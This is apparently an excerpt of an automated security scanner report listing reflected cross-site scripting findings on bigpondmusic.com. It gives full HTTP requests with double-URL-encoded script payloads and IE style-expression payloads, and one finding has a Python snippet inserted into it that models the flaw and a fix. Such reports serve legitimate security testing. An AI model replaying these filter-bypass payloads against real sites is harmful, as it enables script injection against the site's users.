Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /javascript/srTextContainer.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5b1f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e348d75bea16 was submitted in the REST URL parameter 1. This input was echoed as f5b1f"><script>alert(1)</script>348d75bea16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /javascriptf5b1f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e348d75bea16/srTextContainer.js?20100624-053840 HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87968


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/javascriptf5b1f"><script>alert(1)</script>348d75bea16/srTextContainer.js?20100624-053840" />
...[SNIP]...

2.288. http://bigpondmusic.com/javascript/srTextContainer.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /javascript/srTextContainer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45d35'%3b6539c03054d was submitted in the REST URL parameter 1. This input was echoed as 45d35';6539c03054d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /javascript45d35'%3b6539c03054d/srTextContainer.js?20100624-053840 HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
musicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'javascript45d35';6539c03054d';
   s.prop4 = 'srtextcontainer.js';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
...[SNIP]...

2.289. http://bigpondmusic.com/javascript/sraudioplayer.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /javascript/sraudioplayer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8941'%3bf00409023df was submitted in the REST URL parameter 1. This input was echoed as d8941';f00409023df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /javascriptd8941'%3bf00409023df/sraudioplayer.js?20100624-053840 HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88086


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
musicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'javascriptd8941';f00409023df';
   s.prop4 = 'sraudioplayer.js';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;

...[SNIP]...

2.290. http://bigpondmusic.com/javascript/sraudioplayer.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /javascript/sraudioplayer.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e4d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8040fb59f was submitted in the REST URL parameter 1. This input was echoed as 8e4d3"><script>alert(1)</script>a8040fb59f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /javascript8e4d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8040fb59f/sraudioplayer.js?20100624-053840 HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87880


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/javascript8e4d3"><script>alert(1)</script>a8040fb59f/sraudioplayer.js?20100624-053840" />
...[SNIP]...

2.291. http://bigpondmusic.com/javascript/unmetered.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /javascript/unmetered.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b81f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb2bb523864 was submitted in the REST URL parameter 1. This input was echoed as 3b81f"><script>alert(1)</script>bb2bb523864 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /javascript3b81f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb2bb523864/unmetered.js?20100624-053840 HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:20 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88268


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/javascript3b81f"><script>alert(1)</script>bb2bb523864/unmetered.js?20100624-053840" />
...[SNIP]...

2.292. http://bigpondmusic.com/javascript/unmetered.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /javascript/unmetered.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c52d'%3b29b0dcfee78 was submitted in the REST URL parameter 1. This input was echoed as 4c52d';29b0dcfee78 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /javascript4c52d'%3b29b0dcfee78/unmetered.js?20100624-053840 HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87849


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
musicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'javascript4c52d';29b0dcfee78';
   s.prop4 = 'unmetered.js';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.p
...[SNIP]...

2.293. http://bigpondmusic.com/live-gigs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /live-gigs/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae797%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede5ed70a362 was submitted in the REST URL parameter 1. This input was echoed as ae797"><script>alert(1)</script>de5ed70a362 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /live-gigsae797%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede5ed70a362/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88264


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/live-gigsae797"><script>alert(1)</script>de5ed70a362/" />
...[SNIP]...

2.294. http://bigpondmusic.com/live-gigs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /live-gigs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4136'%3b9736a476d52 was submitted in the REST URL parameter 1. This input was echoed as f4136';9736a476d52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-gigsf4136'%3b9736a476d52/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88041


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
pmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'live-gigsf4136';9736a476d52';
   
   
       s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel;
   s.prop11 = 'Non-Registered-Music';
   s.prop12 = 'Non-Registe
...[SNIP]...

2.295. http://bigpondmusic.com/live-gigs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /live-gigs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 151cb"style%3d"x%3aexpression(alert(1))"74351575516 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 151cb"style="x:expression(alert(1))"74351575516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /live-gigs/?151cb"style%3d"x%3aexpression(alert(1))"74351575516=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 111452


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Live Gigs - BigPond Music MP
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/live-gigs/?151cb"style="x:expression(alert(1))"74351575516=1" />
...[SNIP]...

2.296. http://bigpondmusic.com/live-gigs/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /live-gigs/

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb475"style%3d"x%3aexpression(alert(1))"6e6ed52df2d was submitted in the ref parameter. This input was echoed as eb475"style="x:expression(alert(1))"6e6ed52df2d in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a CSS expression() inside an injected style attribute to execute JavaScript; because the payload breaks out of the attribute with a double quote and needs no angle brackets, a filter that only blocks < and > does not stop it. CSS expressions are specific to Internet Explorer (dropped from IE8 standards mode onward) and do not execute in other browsers.

Request

GET /live-gigs/?ref=Net-Head-Music-LiveGigseb475"style%3d"x%3aexpression(alert(1))"6e6ed52df2d HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:16:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 111954


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Live Gigs - BigPond Music MP
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/live-gigs/?ref=Net-Head-Music-LiveGigseb475"style="x:expression(alert(1))"6e6ed52df2d" />
...[SNIP]...

2.297. http://bigpondmusic.com/mixtapes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bd2d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d29116d9f7 was submitted in the REST URL parameter 1. This input was echoed as 5bd2d"><script>alert(1)</script>3d29116d9f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but the check can be bypassed by double URL-encoding them: %253c is decoded once by the web server to %3c, which passes the filter, and is then decoded a second time by the application to <.

Remediation detail

There is probably no need for the application to URL-decode the value of REST URL parameter 1 a second time, since the web server has already decoded it once. In any case, input validation must run after all decoding and canonicalisation has been carried out, and the value should be HTML-encoded for the attribute context when it is written into the parentUrl field.
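The following is an added example and not code from the report or from the site under test. It models the two reflection patterns described in 2.295 to 2.297: a value written raw into the double-quoted parentUrl attribute, and a validation step that runs before a second URL-decode. The blocklist (only < and >) and the decode-then-validate-then-decode order are assumptions inferred from the report, which shows a literal double quote passing through in 2.295 while angle brackets had to be double-encoded in 2.297. The hardened path decodes exactly once and HTML-encodes for the attribute context at the point of output.

```python
"""Model of the parentUrl reflection: why validate-then-decode-again fails, and how
attribute-context output encoding closes both payload styles. Added example; the
pipeline is an inferred model, not the site's actual code."""

from urllib.parse import unquote

# Assumed blocklist: the report says "certain characters" were blocked; a literal
# double quote was reflected in 2.295, so only angle brackets are modelled here.
FORBIDDEN = ('<', '>')
ATTR_TEMPLATE = '<input type="hidden" name="parentUrl" value="{}" />'
ORIGIN = 'http://bigpondmusic.com'

# Constructed request paths, copied from the payload shapes shown in the report.
DOUBLE_ENCODED_PATH = ('/mixtapes5bd2d%2522%253e%253cscript%253ealert%25281%2529'
                       '%253c%252fscript%253e3d29116d9f7/')
STYLE_BREAKOUT_PATH = '/live-gigs/?151cb"style%3d"x%3aexpression(alert(1))"74351575516=1'


def passes_blocklist(value: str) -> bool:
    """Return True when no literal blocklisted character is present."""
    return not any(ch in value for ch in FORBIDDEN)


def vulnerable_render(raw_path: str) -> str:
    """Broken flow: web server decodes once, validation runs, the application
    decodes a second time and writes the result verbatim into the attribute."""
    once = unquote(raw_path)            # %2522 -> %22, %253c -> %3c
    if not passes_blocklist(once):
        return 'REJECTED'
    twice = unquote(once)               # %22 -> ", %3c -> <  (after validation!)
    return ATTR_TEMPLATE.format(ORIGIN + twice)


def html_attr_encode(value: str) -> str:
    """Encode every character that can terminate or alter a quoted attribute."""
    return (value.replace('&', '&amp;')
                 .replace('"', '&quot;')
                 .replace("'", '&#x27;')
                 .replace('<', '&lt;')
                 .replace('>', '&gt;'))


def hardened_render(raw_path: str) -> str:
    """Decode exactly once, validate the canonical value, and encode for the
    attribute context on output. The encoding is what actually prevents the
    injection; the blocklist is kept only as defence in depth."""
    canonical = unquote(raw_path)
    if not passes_blocklist(canonical):
        return 'REJECTED'
    return ATTR_TEMPLATE.format(html_attr_encode(ORIGIN + canonical))


if __name__ == '__main__':
    for path in (DOUBLE_ENCODED_PATH, STYLE_BREAKOUT_PATH):
        print('vulnerable:', vulnerable_render(path))
        print('hardened:  ', hardened_render(path))
```

Run as a script, the vulnerable path reproduces both reflections from the report (a closed attribute followed by a script element, and a closed attribute followed by an injected style attribute), while the hardened output keeps exactly the three attribute pairs of the template.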

Request

GET /mixtapes5bd2d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d29116d9f7/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87933


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
